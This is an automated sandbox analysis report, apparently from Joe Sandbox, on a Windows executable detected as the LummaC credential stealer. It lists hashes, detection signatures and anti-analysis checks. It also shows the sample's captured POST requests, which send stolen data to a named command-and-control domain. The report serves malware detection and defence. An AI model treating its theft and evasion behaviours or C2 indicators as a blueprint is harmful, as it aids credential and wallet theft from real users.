Edit tour

Windows Analysis Report
nyojpsdfkawed.exe

Overview

General Information

Sample name:	nyojpsdfkawed.exe
Analysis ID:	1637344
MD5:	b145d8cdf76ef5fe1b151fb42ee5fcc4
SHA1:	cf94af9e8c0e3d6203b3bde36396a4adade7bd90
SHA256:	4c13ebe1361e08fad18d8bb5ee8377d0518ce03a2592b5784e023703d2e3ba9c
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

nyojpsdfkawed.exe (PID: 7024 cmdline: "C:\Users\user\Desktop\nyojpsdfkawed.exe" MD5: B145D8CDF76EF5FE1B151FB42EE5FCC4)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.936332961.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.936548555.000000000096E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nyojpsdfkawed.exe PID: 7024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nyojpsdfkawed.exe PID: 7024	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.nyojpsdfkawed.exe.d70000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T14:52:32.430508+0100	2028371	3	Unknown Traffic	192.168.2.8	49682	104.21.48.1	443	TCP
2025-03-13T14:52:34.928081+0100	2028371	3	Unknown Traffic	192.168.2.8	49683	104.21.48.1	443	TCP
2025-03-13T14:52:37.629288+0100	2028371	3	Unknown Traffic	192.168.2.8	49684	104.21.48.1	443	TCP
2025-03-13T14:52:39.953860+0100	2028371	3	Unknown Traffic	192.168.2.8	49685	104.21.48.1	443	TCP
2025-03-13T14:52:42.828983+0100	2028371	3	Unknown Traffic	192.168.2.8	49686	104.21.48.1	443	TCP
2025-03-13T14:52:45.629853+0100	2028371	3	Unknown Traffic	192.168.2.8	49687	104.21.48.1	443	TCP
2025-03-13T14:52:49.890414+0100	2028371	3	Unknown Traffic	192.168.2.8	49689	104.21.48.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nyojpsdfkawed.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://htardwarehu.icu/Sbdsa	Avira URL Cloud: Label: malware
Source: https://htardwarehu.icu/	Avira URL Cloud: Label: malware
Source: https://htardwarehu.icu/em	Avira URL Cloud: Label: malware
Source: https://htardwarehu.icu/5	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: nyojpsdfkawed.exe	ReversingLabs: Detection: 84%
Source: nyojpsdfkawed.exe	Virustotal: Detection: 76%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00D8BBA0 CryptUnprotectData,

0_2_00D8BBA0

Source: nyojpsdfkawed.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49689 version: TLS 1.2

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00E01490 FindFirstFileW,

0_2_00E01490

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4417E890h]	0_2_00DBE7E0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi-4FC6521Ah]	0_2_00DB4EA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]	0_2_00D916A0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4C3CF2B1h]	0_2_00D916A0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+000002B0h]	0_2_00D8BBA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00D8BBA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00D8BBA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00D7A340
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00D7A340
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00D727B0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4417E890h]	0_2_00DBE960
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then mov eax, ebx	0_2_00D94A00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	0_2_00DB8DA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-4C66CD08h]	0_2_00D90D00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+0Dh]	0_2_00D90D00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+01A3AABCh]	0_2_00D90D00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 93A82FD1h	0_2_00DB8F90
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-20540284h]	0_2_00DB8F90
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_00D8AF40

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49689 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49687 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0hbyXIo5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14461Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=i88Ef6g798qf3t8KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15047Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=oTl4ZQfOGhXwQHi7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20216Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3N1gfm1EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2390Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0gFhk93Q6ddFe08VXVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570755Host: htardwarehu.icu
Source: global traffic	HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: htardwarehu.icu

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: htardwarehu.icu

Source: unknown

HTTP traffic detected: POST /Sbdsa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: htardwarehu.icu

Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: nyojpsdfkawed.exe, 00000000.00000003.907650514.0000000003D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/
Source: nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/5
Source: nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.907119148.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.857103718.0000000000962000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009C2000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.886000732.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937030934.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030340749.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/Sbdsa
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/em
Source: nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: nyojpsdfkawed.exe, 00000000.00000003.1029675216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.979037073.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.937048170.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030419149.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029178556.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: nyojpsdfkawed.exe, 00000000.00000003.859075243.0000000003D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: nyojpsdfkawed.exe, 00000000.00000003.909329095.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: nyojpsdfkawed.exe, 00000000.00000003.908845692.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: nyojpsdfkawed.exe, 00000000.00000003.909002856.0000000004087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49689 version: TLS 1.2

System Summary

PE file has nameless sections

Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E296B8 NtReadFile,	0_2_00E296B8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29650 NtSetInformationFile,	0_2_00E29650
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29634 NtClose,	0_2_00E29634
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E297F0 NtProtectVirtualMemory,	0_2_00E297F0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29710 NtCreateFile,	0_2_00E29710
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29BD0 NtClose,VirtualFree,	0_2_00E29BD0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28BE4 NtCreateThread,	0_2_00E28BE4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28BB0 NtQueryInformationProcess,	0_2_00E28BB0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28B50 NtDeviceIoControlFile,	0_2_00E28B50
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28CF8 NtCreateUserProcess,	0_2_00E28CF8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28CA0 NtCreateProcessEx,	0_2_00E28CA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28C50 NtCreateProcess,	0_2_00E28C50
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28DE0 NtQuerySecurityObject,	0_2_00E28DE0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28D8C NtSetVolumeInformationFile,	0_2_00E28D8C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28D60 NtOpenKeyEx,	0_2_00E28D60
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28E6C NtFsControlFile,	0_2_00E28E6C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28E14 NtNotifyChangeDirectoryFile,	0_2_00E28E14
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28FE8 NtQueryValueKey,	0_2_00E28FE8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28FB4 NtQueryKey,	0_2_00E28FB4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28F74 NtEnumerateValueKey,	0_2_00E28F74
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28F54 NtOpenKey,	0_2_00E28F54
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28F04 NtAccessCheck,	0_2_00E28F04
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E290B0 NtSetValueKey,	0_2_00E290B0
